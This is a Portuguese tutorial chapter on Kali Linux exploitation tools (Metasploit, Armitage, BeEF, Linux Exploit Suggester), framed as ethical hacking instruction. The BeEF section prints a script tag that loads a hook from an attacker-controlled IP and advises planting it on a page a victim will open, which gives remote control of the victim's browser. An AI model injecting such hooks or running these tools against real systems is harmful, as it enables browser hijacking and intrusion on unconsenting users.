Kali Linux - Ferramentas de Exploração
Neste capítulo, aprenderemos sobre as várias ferramentas de exploração oferecidas pelo Kali Linux.
Metasploit
Como mencionamos antes, o Metasploit é um produto do Rapid7 e a maioria dos recursos pode ser encontrada em sua página da web www.metasploit.com . Ele está disponível em duas versões - edição comercial e edição gratuita. A diferença entre essas duas versões não é muito, portanto, neste caso, estaremos usando a versão Community (gratuita).
Como um Hacker Ético, você usará o “Kali Ditribution” que tem a versão da comunidade Metasploit incorporada, junto com outras ferramentas de hacking ético que são muito confortáveis para economizar tempo de instalação. No entanto, se você deseja instalar como uma ferramenta separada, é um aplicativo que pode ser instalado em sistemas operacionais como Linux, Windows e OS X.
Primeiro, abra o console Metasploit em Kali. Em seguida, vá para Aplicativos → Ferramentas de exploração → Metasploit.
Depois de iniciar, você verá a seguinte tela, onde a versão do Metasploit está sublinhada em vermelho.
No console, se você usar ajuda ou? símbolo, ele irá mostrar uma lista com os comandos do MSP junto com sua descrição. Você pode escolher com base em suas necessidades e o que usará.
Outro comando de administração importante é msfupdateque ajuda a atualizar o metasploit com os exploits de vulnerabilidade mais recentes. Depois de executar esse comando no console, você terá que esperar vários minutos até que a atualização seja concluída.
Ele tem um bom comando chamado “Pesquisar” que você pode usar para encontrar o que deseja, conforme mostrado na imagem a seguir. Por exemplo, quero encontrar exploits relacionados à Microsoft e o comando pode sermsf >search name:Microsoft type:exploit.
Onde “pesquisar” é o comando, “nome” é o nome do objeto que estamos procurando e “tipo” é o tipo de script que estamos procurando.
Outro comando é “info”. Ele fornece as informações sobre um módulo ou plataforma onde é usado, quem é o autor, referência de vulnerabilidade e a restrição de carga que isso pode ter.
Armitage
Armitage GUI para metasploit é uma ferramenta complementar para metasploit. Ele visualiza alvos, recomenda exploits e expõe os recursos avançados de pós-exploração.
Vamos abri-lo, mas primeiro o console metasploit deve ser aberto e iniciado. Para abrir o Armitage, vá para Aplicativos → Ferramentas de exploração → Armitage.
Clique no Connect botão, como mostrado na imagem a seguir.
Quando ele abrir, você verá a seguinte tela.
Armitage é amigável. A área “Alvos” lista todas as máquinas que você descobriu e com as quais está trabalhando, os alvos hackeados são vermelhos com uma tempestade.
Depois de hackear o alvo, você pode clicar com o botão direito nele e continuar explorando o que você precisa fazer, como explorar (navegar) pelas pastas.
Na GUI a seguir, você verá a visualização das pastas, que é chamada de console. Apenas clicando nas pastas, você pode navegar pelas pastas sem a necessidade de comandos metasploit.
No lado direito da GUI, há uma seção onde os módulos de vulnerabilidades são listados.
Carne
BeEF significa Browser Exploitation Framework. É uma ferramenta de teste de penetração com foco no navegador da web. BeEF permite que o testador de penetração profissional avalie a postura real de segurança de um ambiente alvo usando vetores de ataque do lado do cliente.
Primeiro, você deve atualizar o pacote Kali usando os seguintes comandos -
[email protected]:/# apt-get update
[email protected]:/# apt-get install beef-xss
Para começar, use o seguinte comando -
[email protected]:/# cd /usr/share/beef-xss
[email protected]:/# ./beef
Abra o navegador e digite o nome de usuário e a senha: beef.
O gancho BeEF é um arquivo JavaScript hospedado no servidor BeEF que precisa ser executado em navegadores clientes. Quando isso acontece, ele liga de volta para o servidor BeEF comunicando muitas informações sobre o destino. Ele também permite que comandos e módulos adicionais sejam executados no destino. Neste exemplo, a localização deBeEF gancho está em http://192.168.1.101:3000/hook.js.
Para atacar um navegador, inclua o gancho JavaScript em uma página que o cliente verá. Existem várias maneiras de fazer isso, mas a mais fácil é inserir o seguinte em uma página e, de alguma forma, fazer com que o cliente a abra.
<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>
Assim que a página carregar, volte ao Painel de Controle BeEF e clique em “Navegadores Online” no canto superior esquerdo. Após alguns segundos, você deverá ver o pop-up de seu endereço IP representando um navegador conectado. Passar o mouse sobre o IP fornecerá rapidamente informações como a versão do navegador, sistema operacional e quais plug-ins estão instalados.
Para executar o comando remotamente, clique no host “Propriedade”. Em seguida, no comando clique no módulo que deseja executar e, por fim, clique em “Executar”.
Linux Exploit Suggester
Ele sugere possíveis explorações, dada a versão de lançamento ‘uname -r’ do sistema operacional Linux.
Para executá-lo, digite o seguinte comando -
[email protected]:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0
3.0.0 é a versão do kernel do sistema operacional Linux que queremos explorar.